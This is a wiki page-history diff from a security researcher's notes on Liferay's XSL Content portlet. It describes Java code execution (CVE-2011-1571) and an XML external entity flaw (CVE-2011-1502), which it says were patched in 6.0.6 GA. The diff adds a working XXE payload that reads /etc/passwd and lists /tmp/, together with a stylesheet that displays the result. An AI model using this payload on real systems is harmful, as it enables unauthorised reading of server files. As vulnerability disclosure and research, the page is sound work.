Changes for page Application_Liferay

Last modified by Nicolas Gregoire on 2012/04/19 14:05
From version Icon 6.1 Icon
edited by Nicolas Gregoire
on 2012/01/13 14:04
Change comment: There is no comment for this version
To version Icon 19.1 Icon
edited by Nicolas Gregoire
on 2012/01/13 14:39
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Tags
... ... @@ -1,0 +1,1 @@
1 +liferay|java|xalan-j|code execution|xee
Content
... ... @@ -4,14 +4,18 @@
4 4  
5 5  
6 6  
7 +The vulnerabilities described here were patched in version 6.0.6 GA (cf. the [[Release Notes for 6.0.6 GA>>http://issues.liferay.com/secure/ReleaseNote.jspa?version=10656&styleName=Html&projectId=10952||rel="__blank"]]).
7 7  
8 -
9 -
10 10  == Java code execution ==
11 11  
12 12  LIferay includes numerous portlets. The "XSL Content" portlet displays the result of the XSL transformation of a XML document. The XSLT engine used by default is [[Xalan-J>>Engine_Saxon]] (but this can probably modified easily using [[JAXP>>http://en.wikipedia.org/wiki/Java_API_for_XML_Processing||rel="__blank"]]). As Xalan-J allows by default to execute Java code from the stylesheet, that's an easy to exploit vulnerability. Any logged-in user can execute arbitrary Java code in the context of the Web Application server (usually Tomcat) : [[CVE-2011-1571>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1571||rel="__blank"]].
13 13  
14 14  
14 +
15 +Executing commands and reading the output (using the "xalanj-reading-stdout.xsl" script included on the [[Xalan-J>>Engine_XalanJ]] page) :
16 +
17 +[[image:liferay-execute-commands-with-stdout.png||style="display: block; margin-left: auto; margin-right: auto"]]
18 +
15 15  == Additional vulnerabilities ==
16 16  
17 17  Two others vulnerabilities were identified in the "XSL Content" portlet :
... ... @@ -20,6 +20,11 @@
20 20  
21 21  * CVE-2011-1502 : allows to read UTF-8 files and to list directories via a XEE (XML External Entity) attack
22 22  
23 -Reading /etc/passwd using CVE-2011-1502 :
24 24  
28 +
29 +
30 +
31 +Reading /etc/passwd using CVE-2011-1502 (cf attached files [[liferay-xee.xsl>>attach:liferay-xee.xsl]] and [[liferay-xee.xml>>attach:liferay-xee.xml]]) :
32 +
33 +
25 25  [[image:liferay-read-etc-passwd-via-xee.png||style="display: block; margin-left: auto; margin-right: auto"]]
Icon liferay-xee.xml
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +184 bytes
Content
... ... @@ -1,0 +1,9 @@
1 +<!DOCTYPE doc [
2 +<!ENTITY boom1 SYSTEM "/etc/passwd">
3 +<!ENTITY boom2 SYSTEM "/tmp/">
4 +]>
5 +<doc>
6 +<response><file>&boom1;</file></response>
7 +<response><file>&boom2;</file></response>
8 +</doc>
9 +
Icon liferay-xee.xsl
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +319 bytes
Content
... ... @@ -1,0 +1,12 @@
1 +<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
2 +<xsl:template match="/doc">
3 + <html><body>
4 + <xsl:for-each select="response">
5 + <h2>File content :</h2>
6 + <xsl:value-of select="file"/>
7 + <hr/>
8 + </xsl:for-each>
9 + </body></html>
10 +</xsl:template>
11 +</xsl:stylesheet>
12 +